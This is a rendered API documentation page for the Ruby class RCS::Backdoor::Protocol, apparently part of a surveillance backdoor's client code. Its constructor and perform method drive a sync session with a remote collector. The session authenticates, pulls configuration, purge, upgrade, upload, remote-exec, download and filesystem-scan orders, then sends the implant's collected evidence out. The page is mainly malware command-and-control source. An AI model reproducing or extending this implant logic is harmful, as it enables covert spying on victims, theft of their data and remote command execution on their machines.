Class: RCS::Backdoor::Protocol

Inherits:
Object
  • Object
show all
Includes:
Command, Tracer
Defined in:
lib/rcs-backdoor/protocol.rb

Constant Summary

Constants included from Command

Command::INVALID_COMMAND, Command::PLATFORMS, Command::PROTO_BYE, Command::PROTO_CONF, Command::PROTO_DOWNLOAD, Command::PROTO_EVIDENCE, Command::PROTO_EVIDENCE_CHUNK, Command::PROTO_EVIDENCE_SIZE, Command::PROTO_EXEC, Command::PROTO_FILESYSTEM, Command::PROTO_ID, Command::PROTO_NO, Command::PROTO_OK, Command::PROTO_PURGE, Command::PROTO_UNINSTALL, Command::PROTO_UPGRADE, Command::PROTO_UPLOAD

Instance Attribute Summary collapse

Instance Method Summary collapse

Methods included from Command

#authenticate, #authenticate_elite, #authenticate_scout, #bye, #normalize, #randblock, #receive_config, #receive_downloads, #receive_exec, #receive_filesystems, #receive_purge, #receive_upgrade, #receive_uploads, #send_command, #send_evidence, #send_evidence_chunk, #send_evidence_size, #send_id

Constructor Details

#initialize(type, sync) ⇒ Protocol

Returns a new instance of Protocol.



26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
 
# File 'lib/rcs-backdoor/protocol.rb', line 26

def initialize(type, sync)
  case type
    when :REST
      trace :debug, "REST Protocol selected"
      @transport = Transport.new(:HTTP)
    when :RESTS
      trace :debug, "REST SSL Protocol selected"
      @transport = Transport.new(:HTTPS)
    when :ASP, :RSSM
      trace :warn, "#{type} Protocol selected..."
      raise "You must be kidding... :)"
    else
      raise "Unsupported Protocol"
  end  
  @sync = sync
end

Instance Attribute Details

#syncObject

Returns the value of attribute sync.



24
25
26
 
# File 'lib/rcs-backdoor/protocol.rb', line 24

def sync
  @sync
end

#transportObject (readonly)

used by the Command module



23
24
25
 
# File 'lib/rcs-backdoor/protocol.rb', line 23

def transport
  @transport
end

Instance Method Details

#perform(host) ⇒ Object 



43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
 
# File 'lib/rcs-backdoor/protocol.rb', line 43

def perform(host)

  begin

    start = Time.now

    # connection to the remote host
    @transport.connect_to host
    
    # Mixed-in functions
    
    # authenticate with the Collector
    # this step will produce the cryptographic session key
    # we can also receive an uninstall command
    authenticate @sync.backdoor
    
    # send the deviceID, userID, sourceID
    # we will receive the list of available element on the collector 
    available = send_id @sync.backdoor
    
    # receive the new configuration
    receive_config @sync.backdoor if available.include? PROTO_CONF

    # ask for the purge
    receive_purge if available.include? PROTO_PURGE

    # receive the upgrade
    receive_upgrade if available.include? PROTO_UPGRADE

    # receive the files in the upload queue
    receive_uploads if available.include? PROTO_UPLOAD

    # receive the list of commands to be executed
    receive_exec if available.include? PROTO_EXEC

    # receive the list of files to be downloaded
    receive_downloads if available.include? PROTO_DOWNLOAD
    
    # receive the list of paths to be scanned
    receive_filesystems if available.include? PROTO_FILESYSTEM

    # send the size of the evidence queue
    send_evidence_size @sync.backdoor.evidences

    # send the agent's collected evidences
    send_evidence @sync.backdoor.evidences unless @sync.backdoor.evidences.empty?
    
    # terminate the protocol
    bye
    
    # clean up
    @transport.disconnect

    trace :warn, "Total Time is #{Time.now - start} sec"

  rescue Exception => detail
    trace :fatal, "ERROR: " << detail.to_s
    raise
  end
  
end